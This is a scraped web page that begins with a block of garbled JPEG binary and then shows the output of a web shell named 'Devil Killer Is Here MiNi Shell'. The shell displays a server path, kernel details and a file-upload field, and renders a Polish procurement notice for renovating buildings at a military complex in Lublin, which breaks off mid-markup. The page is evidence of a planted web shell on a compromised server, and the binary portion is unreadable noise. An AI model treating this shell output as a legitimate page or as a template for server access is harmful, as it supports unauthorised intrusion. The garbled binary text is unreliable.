JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250625/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250625/0029308601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Roboty budowlane w zakresie: Pak. nr 1 - remoncie bud. nr 1 w kw. przy Al. Racławickich 44 w Lublinie, Pak. nr 2 - remoncie bud. nr 4 w kompleksie wojskowym przy Al. Racławickich 44 w Lublinie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Rejonowy Zarząd Infrastruktury w Lublinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 430268824</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lipowa 1A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rzilublin.zampub@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://rzilublin.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka Organizacyjna MON </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Infrastruktura </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Roboty budowlane w zakresie: Pak. nr 1 - remoncie bud. nr 1 w kw. przy Al. Racławickich 44 w Lublinie, Pak. nr 2 - remoncie bud. nr 4 w kompleksie wojskowym przy Al. Racławickich 44 w Lublinie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-55db3414-d9e5-4a92-b20c-7d670d66a172</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00293086</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00095292/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Roboty budowlane w zakresie:Pakiet nr 1-rob.bud.poleg. na remoncie bud.nr 1 w kompl.wojsk.przy Al. Racł. 44 w Lublinie,Pakietu nr 2-rob.bud.poleg.na rem.bud.nr 4 w kompl.wojsk.przy Al.Racł. 44 w Lub.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-55db3414-d9e5-4a92-b20c-7d670d66a172 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Wykonawcami, a Zamawiającym odbywa się wyłącznie przy <br/>użyciu środków komunikacji elektronicznej, tj.:<br/>a) W zakresie złożenia oferty oraz oświadczeń lub dokumentów składanych wraz <br/>z ofertą – przy użyciu platformy e-Zamówienia https://ezamowienia.gov.pl<br/>UWAGA<br/>Platforma e-Zamówienia służy wyłącznie do złożenia, wycofania lub zmiany <br/>oferty wraz z załącznikami.<br/>Złożenie oferty wraz z załącznikami na nośniku danych (np. CD, pendrive) jest <br/>niedopuszczalne, nie stanowi bowiem jego złożenia przy użyciu środków <br/>komunikacji elektronicznej w rozumieniu przepisów „ustawy o świadczeniu <br/>usług drogą elektroniczną”.<br/>b) W pozostałym zakresie, w szczególności: składania oświadczeń, wniosków <br/>zawiadomień oraz przekazywania informacji – przy użyciu poczty elektronicznej<br/>Zamawiającego, wskazanej w dokumentach postępowania (str. 1 SWZ)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów <br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji <br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania <br/>z platformy e-Zamówienia, Instrukcji Interaktywnej platformy e-Zamówienia. <br/>Przedmiotowa instrukcja, regulamin dostępne są na stronie: <br/>https://ezamówienia.gov.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Postanowienia dotyczące RODO zawarte są w SWZ i we wzorze umowy- załącznik do SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Postanowienia dotyczące RODO zawarte są w SWZ i we wzorze umowy- załącznik do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">5.012/25/TP1/WEN</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia są Roboty budowlane w zakresie: Pakietu nr 1 - Roboty budowlane polegające na remoncie budynku nr 1 w kompleksie wojskowym przy Alejach Racławickich 44 w Lublinie, Pakietu nr 2 - Roboty budowlane polegające na remoncie budynku nr 4 w kompleksie wojskowym przy Alejach Racławickich 44 w Lublinie.<br/><br/>2.	Kody CPV:<br/><br/>45453000-7 Roboty remontowe i renowacyjne – w zakresie Pakietu nr 1, Pakietu nr 2<br/><br/>3.	Zakres Przedmiotu zamówienia obejmuje: <br/>a) w zakresie Pakietu nr 1:<br/><br/> Wykonanie robót budowlanych polegających na remoncie pomieszczeń budynku nr 1 w kompleksie wojskowym przy Alejach Racławickich 44 w Lublinie.<br/><br/>Roboty budowlane będą wykonywane na terenie kompleksu wojskowego w Lublinie, stanowiącego teren zamknięty wymieniony w Decyzji Nr 91/MON Ministra Obrony Narodowej z dnia 26 lipca 2024 r. w sprawie ustalenia terenów zamkniętych w resorcie obrony narodowej.<br/>Obiekt znajduje się w Gminnej ewidencji zabytków miasta Lublin. Roboty budowlane objęte poniższym zakresem nie będą prowadzić do naruszenia substancji lub zmiany wyglądu budynku i nie wymagają pozwolenia Miejskiego Konserwatora Zabytków w Lublinie oraz uzyskania decyzji o pozwoleniu na budowę ani zgłoszenia robót budowlanych.<br/><br/>Stan istniejący:<br/> Teren kompleksu jest zabudowany budynkami, posiada drogi wewnętrzne, place i chodniki oraz tereny zielone. Budynek nr 1 jest obecnie użytkowany.<br/> <br/> Wymogi dotyczące wstępu na teren jednostki:<br/>Dostawy i wstęp osób niezgłoszonych do wykonania robót budowlanych przed ich rozpoczęciem należy każdorazowo uzgadniać z przedstawicielem Jednostki Wojskowej.<br/><br/>Ogólny zakres robót obejmuje:<br/>Budynek nr 1 (pakiet 1)<br/>Przedmiot zamówienia obejmuje częściowy remont budynku nr 1 w zakresie.<br/>	wymiany posadzek, stolarki drzwiowej, ceramicznych okładzin ściennych i urządzeń sanitarnych w remontowanych pomieszczeniach,<br/>	przesunięcia i usunięcia niektórych ścianek działowych,<br/>	wykonania zabudowy kabin z płyt HPL w pomieszczeniach sanitarnych,<br/>	demontażu sufitów podwieszanych,<br/>	wymiany instalacji elektrycznej na parterze,<br/>	uzupełnienia elementów instalacji teletechnicznej w części pomieszczeń<br/>SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA W ZAKRESIE PAKIETU NR 1, OKREŚLAJĄ:<br/><br/>	Specyfikacja techniczna wykonania i odbioru robót,<br/>	Przedmiar robót (pomocniczo)<br/><br/>- stanowiące załącznik nr 1 do SWZ.<br/>(Zamieszczone na stronie internetowej Zamawiającego, spakowane programem <br/>7-zip – dostępnym bezpłatnie pod adresem http://7-zip.org.pl/). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający wybierze ofertę najkorzystniejszą w pakiecie nr 1, nr 2 na podstawie poniższych kryteriów oceny ofert:<br/><br/>Kryterium	Waga<br/>Cena oferty	60%<br/>Okres Gwarancji	40%<br/><br/>2.	Oferty będą oceniane w systemie punktowym. Za najkorzystniejszą uznana zostanie oferta, która uzyska największą liczbę punktów wyliczonych wg wzoru:<br/><br/>P = Pc + Pg<br/>gdzie:<br/>P – suma punktów przyznana ofercie, <br/>Pc – liczba punktów przyznana ofercie w kryterium – cena<br/>Pg – liczba punktów przyznana ofercie w kryterium – gwarancja<br/><br/><br/>a)	Liczba punktów w kryterium – CENA OFERTY zostanie obliczona wg poniższego wzoru:<br/><br/> Cmin<br/>Pc= ( ----------- x 100p ) x 60%<br/> Ci<br/>gdzie: <br/>Pc – liczba punktów przyznana ofercie w kryterium - cena,<br/>Cmin – cena brutto oferty z najniższą ceną,<br/>Ci – cena brutto oferty ocenianej.<br/><br/>Maksymalną ilość przyznanych (obliczonych) punktów za kryterium cena, wynoszącą 60 otrzyma oferta o najniższej cenie. Pozostałe oferty zostaną przeliczone wg powyższego wzoru.<br/><br/>b)	Liczba punktów w kryterium – OKRES GWARANCJI zostanie obliczona wg poniższej tabeli:<br/>Okres gwarancji	24 <br/>miesiące	36 <br/>miesięcy	48<br/>miesięcy<br/>Przyznana liczba punktów Pg	0	20	40<br/><br/><br/><br/><br/><br/><br/>Pg – liczba punktów przyznana ofercie w kryterium – gwarancja<br/><br/>a)	najdłuższy okres udzielenia gwarancji wynosi 48 miesięcy;<br/>b)	Wykonawca w ofercie określi okres gwarancji zgodnie z powyższą tabelą terminów;<br/>c)	Zamawiający nie dopuszcza innych niż ww. okresów gwarancji;<br/>d)	w przypadku niewskazania w ofercie okresu gwarancji w ogóle lub wskazania okresu krótszego, niż określone przez Zamawiającego, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5) ustawy Pzp.<br/>e)	w przypadku wskazania przez Wykonawcę w ofercie dłuższego okresu gwarancji niż określony przez Zamawiającego, Zamawiający przyzna tej ofercie maksymalną ilość punktów tj. 40 punktów.<br/>3.	Zamawiający wybierze spośród złożonych ofert ofertę, która przedstawi najkorzystniejszy bilans punktów wyliczonych w oparciu o ww. kryteria liczone <br/>wg powyższych wzorów z dokładnością do dwóch (2) miejsc po przecinku.<br/><br/>4.	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybierze spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybierze ofertę z najniższą ceną. Jeżeli nie można dokonać wyboru oferty w sposób opisany powyżej, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia są Roboty budowlane w zakresie: Pakietu nr 1 - Roboty budowlane polegające na remoncie budynku nr 1 w kompleksie wojskowym przy Alejach Racławickich 44 w Lublinie, Pakietu nr 2 - Roboty budowlane polegające na remoncie budynku nr 4 w kompleksie wojskowym przy Alejach Racławickich 44 w Lublinie.<br/><br/>2.	Kody CPV:<br/><br/>45453000-7 Roboty remontowe i renowacyjne – w zakresie Pakietu nr 1, Pakietu nr 2<br/><br/>3. Zakres Przedmiotu zamówienia obejmuje:<br/>b) w zakresie Pakietu nr 2:<br/>Wykonanie robót budowlanych polegających na remoncie pomieszczeń budynku nr 4 w kompleksie wojskowym przy Alejach Racławickich 44 w Lublinie.<br/><br/>Roboty budowlane będą wykonywane na terenie kompleksu wojskowego w Lublinie, stanowiącego teren zamknięty wymieniony w Decyzji Nr 91/MON Ministra Obrony Narodowej z dnia 26 lipca 2024 r. w sprawie ustalenia terenów zamkniętych w resorcie obrony narodowej.<br/>Obiekt znajduje się w Gminnej ewidencji zabytków miasta Lublin. Roboty budowlane objęte poniższym zakresem nie będą prowadzić do naruszenia substancji lub zmiany wyglądu budynku i nie wymagają pozwolenia Miejskiego Konserwatora Zabytków w Lublinie oraz uzyskania decyzji o pozwoleniu na budowę ani zgłoszenia robót budowlanych.<br/><br/>Stan istniejący:<br/>Teren kompleksu jest zabudowany budynkami, posiada drogi wewnętrzne, place i chodniki oraz tereny zielone. Budynek nr 4 jest obecnie użytkowany.<br/><br/>Wymogi dotyczące wstępu na teren jednostki:<br/>Dostawy i wstęp osób niezgłoszonych do wykonania robót budowlanych przed ich rozpoczęciem należy każdorazowo uzgadniać z przedstawicielem Jednostki Wojskowej.<br/><br/>Ogólny zakres robót obejmuje:<br/>Budynek nr 4 (pakiet 2)<br/>	wymiana posadzek, stolarki drzwiowej, ceramicznych okładzin ściennych, urządzeń sanitarnych, instalacji elektrycznej w pomieszczeniach sanitarnych,<br/>	przesunięcie i usunięcie niektórych ścianek działowych oraz wykonanie zabudowy kabin z płyt HPL w pomieszczeniach sanitarnych,<br/>	wykonanie okładziny z płytek ceramicznych oraz wymiana balustrady na schodach prowadzących na strych, <br/>	wymiana części belek konstrukcji dachu i impregnacja całości konstrukcji przeciw korozji biologicznej,<br/>	malowanie powierzchni dachu,<br/>	docieplenie stropu I piętra.<br/><br/>SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA W ZAKRESIE PAKIETU NR 2 OKREŚLAJĄ:<br/><br/>	Specyfikacja techniczna wykonania i odbioru robót,<br/>	Przedmiar robót (pomocniczo)<br/><br/>- stanowiące załącznik nr 2 do SWZ.<br/>(Zamieszczone na stronie internetowej Zamawiającego, spakowane programem <br/>7-zip – dostępnym bezpłatnie pod adresem http://7-zip.org.pl/). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający wybierze ofertę najkorzystniejszą w pakiecie nr 1, nr 2 na podstawie poniższych kryteriów oceny ofert:<br/><br/>Kryterium	Waga<br/>Cena oferty	60%<br/>Okres Gwarancji	40%<br/><br/>2.	Oferty będą oceniane w systemie punktowym. Za najkorzystniejszą uznana zostanie oferta, która uzyska największą liczbę punktów wyliczonych wg wzoru:<br/><br/>P = Pc + Pg<br/>gdzie:<br/>P – suma punktów przyznana ofercie, <br/>Pc – liczba punktów przyznana ofercie w kryterium – cena<br/>Pg – liczba punktów przyznana ofercie w kryterium – gwarancja<br/><br/><br/>a)	Liczba punktów w kryterium – CENA OFERTY zostanie obliczona wg poniższego wzoru:<br/><br/> Cmin<br/>Pc= ( ----------- x 100p ) x 60%<br/> Ci<br/>gdzie: <br/>Pc – liczba punktów przyznana ofercie w kryterium - cena,<br/>Cmin – cena brutto oferty z najniższą ceną,<br/>Ci – cena brutto oferty ocenianej.<br/><br/>Maksymalną ilość przyznanych (obliczonych) punktów za kryterium cena, wynoszącą 60 otrzyma oferta o najniższej cenie. Pozostałe oferty zostaną przeliczone wg powyższego wzoru.<br/><br/>b)	Liczba punktów w kryterium – OKRES GWARANCJI zostanie obliczona wg poniższej tabeli:<br/>Okres gwarancji	24 <br/>miesiące	36 <br/>miesięcy	48<br/>miesięcy<br/>Przyznana liczba punktów Pg	0	20	40<br/><br/><br/><br/><br/><br/><br/>Pg – liczba punktów przyznana ofercie w kryterium – gwarancja<br/><br/>a)	najdłuższy okres udzielenia gwarancji wynosi 48 miesięcy;<br/>b)	Wykonawca w ofercie określi okres gwarancji zgodnie z powyższą tabelą terminów;<br/>c)	Zamawiający nie dopuszcza innych niż ww. okresów gwarancji;<br/>d)	w przypadku niewskazania w ofercie okresu gwarancji w ogóle lub wskazania okresu krótszego, niż określone przez Zamawiającego, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5) ustawy Pzp.<br/>e)	w przypadku wskazania przez Wykonawcę w ofercie dłuższego okresu gwarancji niż określony przez Zamawiającego, Zamawiający przyzna tej ofercie maksymalną ilość punktów tj. 40 punktów.<br/>3.	Zamawiający wybierze spośród złożonych ofert ofertę, która przedstawi najkorzystniejszy bilans punktów wyliczonych w oparciu o ww. kryteria liczone <br/>wg powyższych wzorów z dokładnością do dwóch (2) miejsc po przecinku.<br/><br/>4.	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybierze spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybierze ofertę z najniższą ceną. Jeżeli nie można dokonać wyboru oferty w sposób opisany powyżej, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 